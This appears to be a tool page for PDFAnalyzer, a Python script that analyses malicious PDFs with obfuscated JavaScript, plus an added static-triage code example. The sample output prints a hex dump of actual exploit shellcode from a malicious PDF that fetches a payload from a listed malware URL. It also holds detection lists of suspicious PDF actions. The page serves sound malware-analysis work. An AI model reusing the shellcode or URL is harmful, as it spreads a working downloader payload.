PDFAnalyzer

Language: Python

Publication date: 2009-06-02

Updated: 2010-01-10

Description: Script to analyze malicious PDF files containing obfuscated JavaScript code. It uses SpiderMonkey to execute the JavaScript it finds and shows the shellcode that would be launched. Sometimes it is not able to deobfuscate the code, but you can pass the -w option to write the JavaScript code to disk for later manual analysis. Its output has five sections, listing trigger events (/OpenAction and /AA), suspicious actions (/JS, /Launch, /SubmitForm and /ImportData), vulnerable elements, unescaped bytes and URLs, which together give an idea of the file's risk.

Requirements: SpiderMonkey (and Pyrex).

Download it!

Usage

Usage: pdf-analyzer [-w] file
Arguments:
file: the PDF file to be analyzed.
Options:
-w: write JS code and shellcode to disk

# pdf-analyzer sample.pdf
File: sample.pdf

Trigger events:
/OpenAction
/AA

Suspicious actions:
/JS

Vulnerable elements:
util.printf

Unescaped bytes:

43 43 43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 |CCCCCC..[3.f....|
33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df |3.C..........N.|
ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef |...d..d..Bd..n..|
eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef |...d...a........|
66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa |f....w.e......f.|
e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 |...._.-.....f...|
87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e |..!...;...f.....|
96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a |..W.)...f...o.,.|
15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb |.f........f..d..|
85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 |...d....d.......|
c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 |...x...f..d*l/.f|
aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba |........d.....d.|
f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 |.........(.....(|
af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 |.........d.....d|
ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc |..............4.|
bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 |......d.....d...|
cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 |.........d.....d|
ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 |.........d.....d|
ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e |................|
ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 |..l....d5......d|
03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec |.d..d...d..d....|
1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc |..d.....&..B.,..|
19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e |..Q......!......|
d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 |......d.d...2.d.|
a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef |.d...2d.d.*..-..|
07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 |............http|
3a 2f 2f 77 77 77 2e 6b 6f 6e 74 65 72 2e 62 69 |://www.konter.bi|
7a 2f 6d 79 79 2f 6c 6f 61 64 2e 70 68 70 3f 69 |z/myy/load.php?i|
64 3d 36 35 39 33 26 73 70 6c 3d 36 39 00 |d=6593&spl=69.|


URLs in shellcode:
http://www.konter.biz/myy/load.php?id=6593&spl=69
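The five report sections the description lists, worked through in code: this is an added example written for this page, not PDFAnalyzer's own source (which the page does not show). It scans a PDF for the trigger and action names, pulls the JavaScript out of /JS entries (direct literal strings, and indirect objects holding a FlateDecode stream, which is my assumption about where such code usually lives rather than something the page states), decodes the script's %u/%XX escapes into bytes the way unescape() would, hex-dumps them in the layout shown under "Unescaped bytes", and lists URLs found in those bytes. Nothing is executed, so an obfuscated script that only produces its payload at run time is not decoded here; that is the gap the page's SpiderMonkey step closes. The function names, the file name triage.py, the sample PDF and its script are all constructed for the example, and the vulnerable-API list holds only util.printf, the one name the page's output shows.

```python
"""Static triage of a PDF for what PDFAnalyzer reports (trigger events, suspicious
actions, vulnerable JS APIs, unescaped bytes, URLs).  Added example; no JS is run."""
import re, sys, zlib

TRIGGER_KEYS = ["/OpenAction", "/AA"]
ACTION_KEYS = ["/JS", "/Launch", "/SubmitForm", "/ImportData"]
VULNERABLE_CALLS = ["util.printf"]        # the name the page's output shows; extend as needed
NAME_END = rb"(?=[\s()<>\[\]{}/%]|$)"   # a PDF name ends at whitespace or a delimiter
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")

def find_names(data: bytes, keys) -> list:
    return [k for k in keys if re.search(re.escape(k.encode()) + NAME_END, data)]

def read_literal_string(data: bytes, start: int) -> tuple:
    """Decode the PDF literal string whose '(' is at data[start], honouring nested
    parentheses and \\n-style, \\(, \\\\ and \\ddd escapes; returns (bytes, end index)."""
    simple = {b"n": 10, b"r": 13, b"t": 9, b"b": 8, b"f": 12}
    out, depth, i = bytearray(), 1, start + 1
    while i < len(data):
        c, nxt = data[i:i + 1], data[i + 1:i + 2]
        if c == b"\\" and nxt in simple:
            out.append(simple[nxt]); i += 2
        elif c == b"\\" and nxt and nxt in b"01234567":
            digits = re.match(rb"[0-7]{1,3}", data[i + 1:i + 4]).group()
            out.append(int(digits, 8) & 0xFF); i += 1 + len(digits)
        elif c == b"\\":                          # \( \) \\ or an escaped line break
            out += b"" if nxt in (b"\n", b"\r") else nxt; i += 2
        else:
            depth += (c == b"(") - (c == b")")    # balanced parens need no escaping
            if depth == 0:
                return bytes(out), i + 1
            out += c; i += 1
    raise ValueError("unterminated literal string")

def extract_js(data: bytes) -> list:
    """Script behind each /JS key: a literal string is decoded in place; an indirect
    reference (/JS 5 0 R) is followed to its object and a FlateDecode stream there is
    inflated (a direct /Length is required; object streams are not handled)."""
    scripts = []
    for m in re.finditer(rb"/JS" + NAME_END + rb"\s*", data):
        if data[m.end():m.end() + 1] == b"(":
            scripts.append(read_literal_string(data, m.end())[0]); continue
        ref = re.match(rb"(\d+)\s+(\d+)\s+R", data[m.end():m.end() + 32])
        obj = ref and re.search(rb"(?<!\d)%s\s+%s\s+obj(.*?)endobj" % ref.groups(), data, re.S)
        body = obj.group(1) if obj else b""
        start = re.search(rb"stream\r?\n", body)
        length = re.search(rb"/Length\s+(\d+)(?!\s*\d+\s*R)", body)
        if start and length:
            raw = body[start.end():start.end() + int(length.group(1))]
            scripts.append(zlib.decompress(raw) if b"/FlateDecode" in body else raw)
        elif b"(" in body:
            scripts.append(read_literal_string(body, body.index(b"("))[0])
    return scripts

def unescape_js(js: bytes) -> bytes:
    """What unescape() would build: %uXXXX -> the UTF-16 code unit as two bytes, low
    byte first (its layout in memory); %XX -> one byte."""
    out = bytearray()
    for m in re.finditer(rb"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", js):
        v = int(m.group(1) or m.group(2), 16)
        out += bytes([v & 0xFF, v >> 8]) if m.group(1) else bytes([v])
    return bytes(out)

def hexdump(data: bytes) -> list:
    """16 bytes per line in the 'hex |ascii|' layout of the page's output."""
    return [" ".join(f"{b:02x}" for b in data[o:o + 16]) + " |"
            + "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[o:o + 16]) + "|"
            for o in range(0, len(data), 16)]

def find_urls(data: bytes) -> list:
    return sorted({m.group().decode("ascii") for m in URL_RE.finditer(data)})

def analyze(data: bytes) -> dict:
    joined = b"\n".join(extract_js(data))
    shellcode = unescape_js(joined)
    return {"Trigger events": find_names(data, TRIGGER_KEYS),
            "Suspicious actions": find_names(data, ACTION_KEYS),
            "Vulnerable elements": [c for c in VULNERABLE_CALLS if c.encode() in joined],
            "Unescaped bytes": hexdump(shellcode),
            "URLs in shellcode": find_urls(shellcode),
            "Other URLs": find_urls(data + b"\n" + joined)}   # file body or decoded JS

# Constructed sample: app.alert(1) as a direct /JS string under /AA, plus a script in
# an indirect FlateDecode stream whose escapes decode to "AABB", a URL and a NUL.
_JS = (b'var p = unescape("%u4141%u4242%68%74%74%70%3a%2f%2f%78%2e%69%6e%76'
       b'%61%6c%69%64%2f%61%00");\nvar s = util.printf("%s", p);\n'
       b'var u = "http://example.invalid/p?id=1";')
_STREAM = zlib.compress(_JS)
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 4 0 R >> endobj\n3 0 obj << /Type /Page"
    b" /AA << /O << /S /JavaScript /JS (app.alert(1)) >> >> >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n5 0 obj << /Length "
    + str(len(_STREAM)).encode() + b" /Filter /FlateDecode >>\nstream\n" + _STREAM
    + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":                       # usage: python3 triage.py [file.pdf]
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for title, items in analyze(data).items():
        print(f"\n{title}:\n" + "\n".join(items))
```

Run it without arguments to report on the embedded sample, or with a path to triage a file. On a real document, a /JS entry whose stream uses an indirect /Length, or that sits inside an object stream, is skipped rather than decoded, and a name that appears only inside a compressed stream is invisible to the keyword scan; both cases are what a full parser, or the -w dump followed by manual inspection, would cover.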